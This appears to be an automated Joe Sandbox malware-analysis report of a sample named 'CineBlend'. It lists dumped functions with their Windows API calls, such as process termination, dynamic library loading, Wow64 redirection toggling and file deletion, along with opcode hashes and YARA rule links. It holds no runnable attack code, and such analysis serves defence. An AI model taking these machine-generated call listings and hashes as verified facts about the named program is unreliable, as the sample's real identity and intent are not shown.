Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 07a98583e488931d6b654f072526d8e514b9bb371444fc4c230bde2e34220772
Instruction ID: e39cde1a11cfbaa68e925897484e80a33fe02a30981bad8a14b304d1bb949fbd
Opcode Fuzzy Hash: 07a98583e488931d6b654f072526d8e514b9bb371444fc4c230bde2e34220772
Instruction Fuzzy Hash: 1AF0C876504A0126D2122735AC0AE6E16EADFD7F70B2504A4F924F32D1EF2C8B029161

Function 00BC9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00B31F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31F87
Part of subcall function 00B31F2D: SelectObject.GDI32(?,00000000), ref: 00B31F96
Part of subcall function 00B31F2D: BeginPath.GDI32(?), ref: 00B31FAD
Part of subcall function 00B31F2D: SelectObject.GDI32(?,00000000), ref: 00B31FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BC94AA
LineTo.GDI32(?,00000003,00000000), ref: 00BC94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BC94CC
LineTo.GDI32(?,00000000,00000003), ref: 00BC94DC
EndPath.GDI32(?), ref: 00BC94EC
StrokePath.GDI32(?), ref: 00BC94FC

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d6d84fdde3974c51f00c00cca3bcb5a4e0ecd1b96faf82eca792e85e2e68e49f
Instruction ID: 05f18677f826abfff2c2ed333aa3ff3f2f0ec69fcbe3927b42678ea19e971996
Opcode Fuzzy Hash: d6d84fdde3974c51f00c00cca3bcb5a4e0ecd1b96faf82eca792e85e2e68e49f
Instruction Fuzzy Hash: 84111B7600010DBFEF129F94DC88F9A7FADEF08360F048066BA595A161CB719D55DBA0

Function 00B95B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B95B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00B95B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B95B94
ReleaseDC.USER32(00000000,00000000), ref: 00B95B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B95BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B95BC5

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f72a2f91066d400bfb3207e0b7732f405ef5724c5bdbc5497e811a2c92bf3e78
Instruction ID: 1e1cef04d279930d79d9833bc7244e1b291b6b89efcb414ec6d22b38e9e7fac3
Opcode Fuzzy Hash: f72a2f91066d400bfb3207e0b7732f405ef5724c5bdbc5497e811a2c92bf3e78
Instruction Fuzzy Hash: 83014475A40718BBEF119FA99C49F4EBFB8EB49751F0440B5FA05A7280DA709C01CBA0

Function 00B3327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B332AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B332B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B332C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B332CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B332D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B332DD

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c65a450a0076f9d3bca972801434618a328e572b53fceda12b9dede5d6110b60
Instruction ID: 09b15ea987826aa983a4fc81ca872ea54a4dbfabb4bc7bf97c54b5d7fe86a131
Opcode Fuzzy Hash: c65a450a0076f9d3bca972801434618a328e572b53fceda12b9dede5d6110b60
Instruction Fuzzy Hash: 270167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00B9F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B9F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B9F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00B9F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B9F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B9F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B9F48C

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: a334187181a5d620814d12ad54783c48b37efc74ffef0182eac0b0b7e480e161
Instruction ID: 07d1bc9c6ada06dc7b332d376ef202b5a9619e067216bee5e08e129eb7023d54
Opcode Fuzzy Hash: a334187181a5d620814d12ad54783c48b37efc74ffef0182eac0b0b7e480e161
Instruction Fuzzy Hash: 61F0B436201158BBE72057529C0EEEF7F7CEFCAB11F000078F601E2190DBA01A02C6B5

Function 00B734D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00B734EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00B73506
GetWindowDC.USER32(?), ref: 00B73512
GetPixel.GDI32(00000000,?,?), ref: 00B73521
ReleaseDC.USER32(?,00000000), ref: 00B73533
GetSysColor.USER32(00000005), ref: 00B7354D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: babafbcbc619c118d4a8c012bb16e0714d630da3b62b04ccb867881a279a135d
Instruction ID: 4c093fd7baa8f1ab3273536c59a4823f74a4159f52a9b8f5f44912d7b4e1b06b
Opcode Fuzzy Hash: babafbcbc619c118d4a8c012bb16e0714d630da3b62b04ccb867881a279a135d
Instruction Fuzzy Hash: B2011235500205EFDB505BA4DC09FAABBF5FB18721F5141B0FA2AA21A0CF311E52EB10

Function 00B921C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B921CC
UnloadUserProfile.USERENV(?,?), ref: 00B921D8
CloseHandle.KERNEL32(?), ref: 00B921E1
CloseHandle.KERNEL32(?), ref: 00B921E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00B921F2
HeapFree.KERNEL32(00000000), ref: 00B921F9

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6276464f32ccd43aaeb4b1b4b6f474fb5f96a25f799ddfbb5a5fbc4316cc9b14
Instruction ID: 47af7e200a17adcdf7d357e7a5c3c7b8ececcdb5f1df9001eb069d4cd905a041
Opcode Fuzzy Hash: 6276464f32ccd43aaeb4b1b4b6f474fb5f96a25f799ddfbb5a5fbc4316cc9b14
Instruction Fuzzy Hash: FDE0C2BA004505BBDB011BA2EC0CD0ABF29FB8D322B144235F22593070CF329422DB50

Function 00B9CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B341EA: _wcslen.LIBCMT ref: 00B341EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B9CF99
_wcslen.LIBCMT ref: 00B9CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B9D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B9D075

Strings

0, xrefs: 00B9CF5A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: f11c0159c4ed4c744d4e099a2f8c59df4e9220ec3d7f840b7c9f28a823a5c290
Instruction ID: 3c187056347e9d7cd2ec72ff3401ba03e82217e9a1c79342d608d756be077b4c
Opcode Fuzzy Hash: f11c0159c4ed4c744d4e099a2f8c59df4e9220ec3d7f840b7c9f28a823a5c290
Instruction Fuzzy Hash: AC51ED716043009BDF20AF29C899B6BBBE8EF89314F040ABDF995E3191DB70C909C752

Function 00BBB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00BBB903

Part of subcall function 00B341EA: _wcslen.LIBCMT ref: 00B341EF

GetProcessId.KERNEL32(00000000), ref: 00BBB998
CloseHandle.KERNEL32(00000000), ref: 00BBB9C7

Strings

<, xrefs: 00BBB8CB
@, xrefs: 00BBB8D2

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 890a9acf67d1e9258003f81d4981eefe2cc63c64162f13e976e2407fada6f5e4
Instruction ID: 664122503a7e0533edeabc509496fdac8d2d0da38e8cefb5a7b1f5428adb8b85
Opcode Fuzzy Hash: 890a9acf67d1e9258003f81d4981eefe2cc63c64162f13e976e2407fada6f5e4
Instruction Fuzzy Hash: 64717975A00615DFCB10EF54C495AAEBBF4FF08300F148499E956AB392CBB4ED45CB90

Function 00B97B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B97B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B97BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B97BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B97C36

Strings

DllGetClassObject, xrefs: 00B97BA9

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 603bdedfbb2eecd53433ba04bf32513c1d1575afba6efeeea78423da2cade0a6
Instruction ID: 1eb9fdad929e5dfc25f099ac8f46bd1585c478762414f51e5ed6be4f9ddf7052
Opcode Fuzzy Hash: 603bdedfbb2eecd53433ba04bf32513c1d1575afba6efeeea78423da2cade0a6
Instruction Fuzzy Hash: 13418EB1654204EFDF15DF64D884A9ABBF9EF48314F1480F9A9099F245DFB0E944CBA0

Function 00BC4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC48D1
IsMenu.USER32(?), ref: 00BC48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BC492E
DrawMenuBar.USER32 ref: 00BC4941

Strings

0, xrefs: 00BC4825

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: b4211e43695f36cbd11a79aac66f0bc5a3e6f8b838014be108e6b8215023f312
Instruction ID: 0da1546a764c8a40e61406d93786fc4d43f057fad005729b580c61b2d05d0d8f
Opcode Fuzzy Hash: b4211e43695f36cbd11a79aac66f0bc5a3e6f8b838014be108e6b8215023f312
Instruction Fuzzy Hash: F3414679A01219AFDB10CF61D894FAABBF9FF0A324F0441ADF945A7250D770AE44CB60

Function 00B9272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00B945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B94620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B927B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B927C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B927F6

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

Strings

ListBox, xrefs: 00B92772
ComboBox, xrefs: 00B9273D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 19bbb64844a4947657ce32af6a3e120286e7eae453fe2dfbd3631cb3ae270d61
Instruction ID: c89ed786e0e779e9db65620da09dfba3728f90793bf92202bcac514a9ad9a82a
Opcode Fuzzy Hash: 19bbb64844a4947657ce32af6a3e120286e7eae453fe2dfbd3631cb3ae270d61
Instruction Fuzzy Hash: FB21B175D00104BBDB05ABA4D886DFEB7E8DF453A0F2041B9F921A71E1CB384D0A9A60

Function 00BC39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BC3A29
LoadLibraryW.KERNEL32(?), ref: 00BC3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BC3A45
DestroyWindow.USER32(?), ref: 00BC3A4D

Strings

SysAnimate32, xrefs: 00BC3A04

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: aefd465577180608ea0b1182568c3898ad9139049d113122f14a028604e742f2
Instruction ID: 0d964f3d30680d7c9defec2f382dc4708b000c0b82d4a4faa2cb20d3e833c158
Opcode Fuzzy Hash: aefd465577180608ea0b1182568c3898ad9139049d113122f14a028604e742f2
Instruction Fuzzy Hash: A721DE71200609AFEF109F64DC80FBF77E9EB49B64F509269FA91920E0C7B1CD609B60

Function 00B550DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B5508E,00000003,?,00B5502E,00000003,00BF98D8,0000000C,00B55185,00000003,00000002), ref: 00B550FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B55110
FreeLibrary.KERNEL32(00000000,?,?,?,00B5508E,00000003,?,00B5502E,00000003,00BF98D8,0000000C,00B55185,00000003,00000002,00000000), ref: 00B55133

Strings

mscoree.dll, xrefs: 00B550F6
CorExitProcess, xrefs: 00B55108

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a3f7183081b10d8c21dccda778de9650f15052f3b819f835c59701b8216ce5a7
Instruction ID: 6363548bfc6e099154657a16234bdf136d86d41943fe37fce7cd746b5079fc05
Opcode Fuzzy Hash: a3f7183081b10d8c21dccda778de9650f15052f3b819f835c59701b8216ce5a7
Instruction Fuzzy Hash: 15F03C34A00608BBDB119F95DC59BADBFF5EF48753F0400E9E809A2260DF749E44CA94

Function 00B3663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B3668B,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B3664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B3665C
FreeLibrary.KERNEL32(00000000,?,?,00B3668B,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B3666E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00B36656
kernel32.dll, xrefs: 00B36642

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 358f5d4fcb29578efa9db3be3e85fe2fe3bd1c4df5d14ccc597a2f9d098f4cbc
Instruction ID: e26631e52a5b3a15bfc0e96de7f9e81b85cfe5d9029cb89c7ed4be4cfa281630
Opcode Fuzzy Hash: 358f5d4fcb29578efa9db3be3e85fe2fe3bd1c4df5d14ccc597a2f9d098f4cbc
Instruction Fuzzy Hash: 15E0863D7015222792112725AC09FABB6A8DF96B52F194165F904E3154DF50CC0180B4

Function 00B36607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B75657,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B36610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B36622
FreeLibrary.KERNEL32(00000000,?,?,00B75657,?,?,00B362FA,?,00000001,?,?,00000000), ref: 00B36635

Strings

Wow64RevertWow64FsRedirection, xrefs: 00B3661C
kernel32.dll, xrefs: 00B36609

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 8293619f970abce08a885eb5484f6d8bae1a0f5a78d9c71eb6d56412ab0c6354
Instruction ID: 0a6ce188696dfaa3cd8208f997e72dbc2b0389d8b8ff5f81f8e8caaa714963e5
Opcode Fuzzy Hash: 8293619f970abce08a885eb5484f6d8bae1a0f5a78d9c71eb6d56412ab0c6354
Instruction Fuzzy Hash: 1DD0123961293167422227256C19FDF7BA4DE95B5172940B9B904B3134CF60CD05C598

Function 00BA3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BA35C4
DeleteFileW.KERNEL32(?), ref: 00BA3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BA365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BA366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BA367F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
